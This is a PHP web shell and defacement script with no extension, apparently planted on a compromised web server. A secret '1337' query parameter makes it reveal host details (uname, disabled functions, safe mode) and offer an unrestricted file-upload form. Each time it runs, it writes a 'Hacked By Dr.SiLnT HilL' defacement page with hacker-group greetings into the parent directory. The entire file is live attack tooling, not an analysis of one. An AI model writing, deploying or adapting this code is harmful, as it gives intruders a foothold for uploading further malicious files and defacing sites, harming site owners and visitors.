<?php 
// name of the file is: Ƙi (it has no extension)
error_reporting(0);

if(isset($_GET["1337"]))
	{
		echo"<font color=#000FFF>[uname]".php_uname()."[/uname]";echo "<br>";print "\n";if(@ini_get("disable_functions")){echo "DisablePHP=".@ini_get("disable_functions");}else{ echo "Disable PHP = NONE";}echo "<br>";print "\n";if(@ini_get("safe_mode")){echo "Safe Mode = ON";}else{ echo "Safe Mode = OFF";} echo "<br>";print "\n";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}} }

echo 'uname:'.php_uname()."\n";
echo getcwd() . "\n";

$file = '<html dir="rtl">

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>HacKed By Dr.SiLnT HilL</title>
<meta name="keywords" content="Hacked By Dr.SiLnT HilL">
<meta name="description" content="Hacked By Dr.SiLnT HilL">
</head>

<body bgcolor="#000000">

<p align="center"><b><font face="Comic Sans MS" size="4" color="#FFFFFF">Hacked By 
Dr.SiLnT HilL </font>
<p align="center">
<img border="0" src="http://www.up-king.com/almaciat/6avc3btdvtc1g3m57pgv.jpg" width="430" height="210"></p>
<p align="center">&nbsp;</p>
<p align="center"><b><font color="#FFFFFF" face="Comic Sans MS" size="4">From : </font></b>
<font color="#FFFFFF" size="4" face="Comic Sans MS">
<span id="result_box" class="short_text"><span style="font-weight: 700">Behind 
the Sun</span></span></font></p>
<p align="center"><b><font face="Comic Sans MS" size="4" color="#FFFFFF">e0g# : 
fb.com/f.l0ve</font></b></p>
<p align="center"><b><font color="#FFFFFF" face="Comic Sans MS">Gr33Tz T0 :.IraQeN-H4XORZ ! Mstr Haxor ! And All Members Site 1337exploit../Copying - 2015 </font></b></p>
<p align="center"><b><font color="#FFFFFF" size="5">Owner</font><font color="#ffffff" size="5">
</font><font color="#FFFFFF" size="5">Hacker</font><font color="#ffffff" size="5">
</font><font color="#FFFFFF" size="5">Egypt</font></b></p>
<p align="center"><b><font face="Tahoma" size="2" color="#FF0000">No Love ForEver.</font></b></p>
<p align="center"><b><font face="Tahoma" size="2" color="#FF0000">Don3../#</font></b></p>

</body>

</html>';

$r=fopen("../1337.html", "w"); fwrite($r,$file); fclose($r);


?>